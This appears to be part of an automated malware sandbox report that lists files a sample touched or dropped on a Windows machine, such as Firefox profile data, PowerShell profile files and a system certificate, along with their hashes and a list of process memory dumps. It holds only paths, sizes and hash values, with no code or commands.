C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\sessionstore-backups\recovery.baklz4

Filesize
15KB

MD5
1adb6af06f0636a54ac3d824993fa98f

SHA1
e5ddcf836f2d68eb13f2540e1dddcf8c0cebe523

SHA256
ad4abd843405e7148f8b7af35c7fd6c78ca725e807c49c9b8413ee4d37dbad73

SHA512
dcfdd42282c894cc4cf17f259b9694f5b7e0870771df1f306596d8c113366ba9acc4b04832bfa51033afe1df97b62362835fc83c31f9146b6b705e5732714787

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
5KB

MD5
c691762db170ec7864f0590fc4b21601

SHA1
ee7d3ac3b3f330cf6d8bf46f991639cbc98659a1

SHA256
4de16886586e7b47a184d5b91be10dfb58583420148562a3fc24786fe1d1d7a0

SHA512
301d445c4b6aed6bf3021b853625a03855c1cdcdf92fba958c5063b89bb0904f1cd79a5e7dbdb301ac2e72956f91071130b74cbf9e472d2210afcf349d826832

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
3.5MB

MD5
2592c942c155828bfa72f7eb341eab07

SHA1
e47b9d6f7c0bf3ee022f77cdf3589384f03898dc

SHA256
71ce9abb408f21d68c78927dff4e2664e1e23422c318389a959b861d094cd02d

SHA512
616e80407e6378bfaeef35390fdd8247b8bb31b9d863e9c91cfbc81dc4d13e20e407fdf9ca7b9dc1310e77ef2abe128eca9cdf42fb2ba8489eaa6c9f5d8e12c9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
1.8MB

MD5
8ee88c4469554e81509378aaa6509a95

SHA1
1bf66a7be67ff97ed4259eceebf6af6d062ad5f3

SHA256
58bf106cc126c2a4047209e607253f4954e6150bd3a983b7547e782311d1e12b

SHA512
5518a785c6b3cc821fed92bdba8b325e5a54bb543dc16f56da56dcdee95b7580cac380d93f62d519ac256ca3947985f7c4c8fcc09d3a4a0d363b0f2ad05d7b5e

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_frhfbugl.ndf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
6e8a22d25f5b76a8d6ec8aee6df8be5f

SHA1
c587d7d3db3925a4a74782de196b7b05fb73e73e

SHA256
c12f1de062291c115fd4af16fb0b5236d75e063d65841f5be33d35018812f5fc

SHA512
76b9e5729d65622b8c0e1e1292a92c6df3021cccf0516f9f19af0dac23514b593296d445111071912b2d5e7afa184707f3b189d955c9e77ba4226fc1be0aa7b2

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
f8aa3ae6fa83297f711d8f51d993df7d

SHA1
9953fef830e661fb975c99545d4036c837be3191

SHA256
f93357e7dc125b40e49d81f26161f4e73ea995f9607718fc7e72db74033bb72b

SHA512
9e77b5bda015fc07c07c3ba15287bad9670ea349fb834ea0c4b2da630cf4a5b19e5402d552102d08f0f0761264d2e168717edbe895fd2121891727cc591d9c85

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
1040f0d6875ae072cb52ba430be592f5

SHA1
79d7b0766a0b0b2d6b38db18e3b75a2742d5c050

SHA256
b5d9056b1e48d768da4d897fee65af88b8388e5614494c36d7fd5ddec21609db

SHA512
c68dc402bc7a7f97b31ae781166d670ecfaef9587f0a185716fb4bb0ec0154094496dfd98cc2c4cc8ecf3f3826ac2dbb968861cc4b2a1ed66a1d9b323466734b

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
a7a3491f1c0759f091406d6bd0098f28

SHA1
2d620fec79ad3b4b40ec15600333247765fdcffb

SHA256
bf1c94cad53bdb4b081b204f00b2ee8fba875b26ff8f79eaf83e5dba7635896c

SHA512
45e0b1e41f1eaf2fee03c5f31555a42d397e8cceeb9b4a8970aae8da4535799f49e18ced56dab2c2ddc6ca251dc0b4dcbaa9eb0287d2e68646d640c3c7436593

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
3KB

MD5
9856caea388398e10def80dd036a82d9

SHA1
0f5edeb7b2801751a63f45f863e6658e5f6091c3

SHA256
62f2eb0bdc88d9a7d2bb69fc8f7c06126e2b92fdd75b182d2f71cf1a1f2d65a6

SHA512
6bc8955e3b253055faf4b012a267c4f41ab9f7f2665d003bc7488b6806e72373c1d43fa234a8145fad1c7bd76e2bc4a2145fc59c7c3ef907f0b20a4cac34452b

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
6d099a2226b2c475a5d30daba9c9b1a4

SHA1
37d835ce4ab8e7bc6373c292bc7bf6c52bde76bd

SHA256
a9602e4964912e131561cb4ed1d7d87c9b8c58e1ca2128e212a00f6e0fccbc1c

SHA512
5705d96fa7e23c1dfce0ccf7aa75c3393b8fda5dba029bc1abd80427d8c422e86306b85036d13180310b620d08985caa9736e7c93f316d3eb67ad12ba300718c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
c6888c73d93d4bb6d05d610cbe0a4d59

SHA1
ae399c540ad262036ead7fcc76a5c021c2750a5e

SHA256
b294b61bbb2acb350b6cb43bb4940cde23ba17966b9c10859949ac468f3c61cc

SHA512
02cd40ea2d7eb23d37c933fe38ab5424d15ee3f5d0e35d987587111e112cb20eaab0f23b96d753fe849a67f38ba51b27e8452590d3184555140a4118a6b176ad

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
bfae14af9f3b4944a9acaa4fb67faed3

SHA1
8882fc283e951f4e0effed8d9f3fd104bc0f8037

SHA256
fb153b0effa320faabf2290c6182a607eb46384e413101aa2c0aa94deb764dca

SHA512
f0466b643240c1bb3ea4953bc8278e217cc6e86694d75a5a9894e89849fa8afd85b8799e4d1feab1c263dc9dfd9156084b7ba0c3cfcc02d46b06019b698ba6bb

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\4BA0675EEC4EC6F9224164EA55AF45B0A19FA8E7

Filesize
1KB

MD5
3b8049e9ece2c334a5a2aa17a6580ec2

SHA1
8e19108b17d3bc7100b32d18b534132009198a8b

SHA256
7107b20e9b47b971df09ad2f3921935497e8e71366edfacec9ef5b7118d27b43

SHA512
93ada6bef46f31dfe3dcfde0de3ee53bf60284b06798d76c11661ad3e5911e95238a52ed1c083a1169c334f4e67547571234b00693b2c63539a9fb7b15058a42

Download Submit
memory/1080-5293-0x00007FF7C0640000-0x00007FF7C09B5000-memory.dmp

Filesize
3.5MB

Download
memory/1080-5294-0x00007FF7C0640000-0x00007FF7C09B5000-memory.dmp

Filesize
3.5MB

Download
memory/1816-4958-0x00007FF72C160000-0x00007FF72C4D5000-memory.dmp

Filesize
3.5MB

Download
memory/1816-4909-0x00007FF72C160000-0x00007FF72C4D5000-memory.dmp

Filesize
3.5MB

Download
memory/1816-4913-0x00007FF72C160000-0x00007FF72C4D5000-memory.dmp

Filesize
3.5MB

Download
memory/1816-4912-0x00007FF72C160000-0x00007FF72C4D5000-memory.dmp

Filesize
3.5MB

Download
memory/1848-5292-0x00007FF7C0640000-0x00007FF7C09B5000-memory.dmp

Filesize
3.5MB

Download
memory/1848-5291-0x00007FF7C0640000-0x00007FF7C09B5000-memory.dmp

Filesize
3.5MB

Download
memory/1848-5047-0x00007FF7C0640000-0x00007FF7C09B5000-memory.dmp

Filesize
3.5MB

Download
memory/1848-5048-0x00007FF7C0640000-0x00007FF7C09B5000-memory.dmp

Filesize
3.5MB

Download
memory/1848-5258-0x00007FF7C0640000-0x00007FF7C09B5000-memory.dmp

Filesize
3.5MB

Download
memory/2464-4967-0x00007FF72C160000-0x00007FF72C4D5000-memory.dmp

Filesize
3.5MB

Download
memory/2464-4945-0x00007FF72C160000-0x00007FF72C4D5000-memory.dmp

Filesize
3.5MB

Download
memory/3280-4778-0x00007FF7BD3A0000-0x00007FF7BD715000-memory.dmp

Filesize
3.5MB

Download
memory/3280-4779-0x00007FF7BD3A0000-0x00007FF7BD715000-memory.dmp

Filesize
3.5MB

Download
memory/3280-4775-0x00007FF7BD3A0000-0x00007FF7BD715000-memory.dmp

Filesize
3.5MB

Download
memory/3796-4813-0x00000263C00B0000-0x00000263C0126000-memory.dmp

Filesize
472KB

Download
memory/3796-4812-0x00000263BFFE0000-0x00000263C0024000-memory.dmp

Filesize
272KB

Download
memory/3796-4804-0x00000263BFAB0000-0x00000263BFAD2000-memory.dmp

Filesize
136KB

Download
memory/5556-4874-0x0000019F282B0000-0x0000019F28472000-memory.dmp

Filesize
1.8MB

Download
memory/5556-4873-0x0000019F27EC0000-0x0000019F27ECA000-memory.dmp

Filesize
40KB

Download
memory/5556-4872-0x0000019F28020000-0x0000019F280D5000-memory.dmp

Filesize
724KB

Download
memory/5556-4871-0x0000019F27F20000-0x0000019F27F3C000-memory.dmp

Filesize
112KB

Download
memory/5580-4788-0x00007FF7BD3A0000-0x00007FF7BD715000-memory.dmp

Filesize
3.5MB

Download
memory/5580-4782-0x00007FF7BD3A0000-0x00007FF7BD715000-memory.dmp

Filesize
3.5MB

Download